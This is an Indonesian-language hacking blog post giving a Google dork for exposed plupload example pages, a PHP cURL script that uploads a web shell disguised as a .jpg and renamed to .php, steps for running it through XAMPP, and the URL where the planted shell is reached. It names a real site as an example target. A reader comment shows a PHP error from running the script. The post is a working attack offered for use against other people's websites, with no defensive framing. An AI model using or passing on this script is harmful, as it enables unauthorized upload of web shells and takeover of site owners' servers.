xiixhix,, Nuenomaru disini .-.
dah lagi males basa basi
TKP:
Dork ~ inurl:/plupload/examples/
Exploit ~ www.target.com/[path]/plupload/examples/upload.php
Vulnerability ~ {"jsonrpc" : "2.0", "result" : null, "id" : "id"}
Contoh : http://book-shelf.jp/plupload/examples/upload.php
Ubah Format Shell Kamu jadi format shell.jpg ~ Shell punya saya ~ chaYankVica.jpg
Code PHP :
<?php
$url = "http://target.com/plupload/examples/upload.php"; // put URL Here
$post = array
(
"file" => "@chaYankVica.jpg",
"name" => "chaYankVica.php"
);
$ch = curl_init ("$url");
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 5);
curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt ($ch, CURLOPT_POST, 1);
@curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
$data = curl_exec ($ch);
curl_close ($ch);
echo $data;
?>
save dengan format php.
ganti tulisan berwarna merah sesuai nama shell kalian >.<
ganti target.com dengan web target kalian
Langkah:
install xampp
taruh uploader nya di folder C:/xampp/php
save dengan format php ya
taruh juga shell kalian yang berformat jpg di C:/xampp/php
nyalakan xampp apache klik start
buka cmd
ketikan:
cd C:/xampp/php
php plupload.php
enter dan nanti akan muncul jika done
Shell Acces : www.target.com/[path]/plupload/examples/uploads/shell.php
atau
Jadinya Seperti ini Deh ~ http://target.com/plupload/examples/uploads/chaYankVica.php
Source and thanks to: Forum INCEF
./Nuenomaru
1 comments
PHP Fatal error: Uncaught Error: Call to undefined function curl_init() in /home/minoritycode/Documents/plup.php:9
Stack trace:
#0 {main}
thrown in /home/minoritycode/Documents/plup.php on line 9
dah coba di windows dan linux error nya sama gan :(
EmoticonEmoticon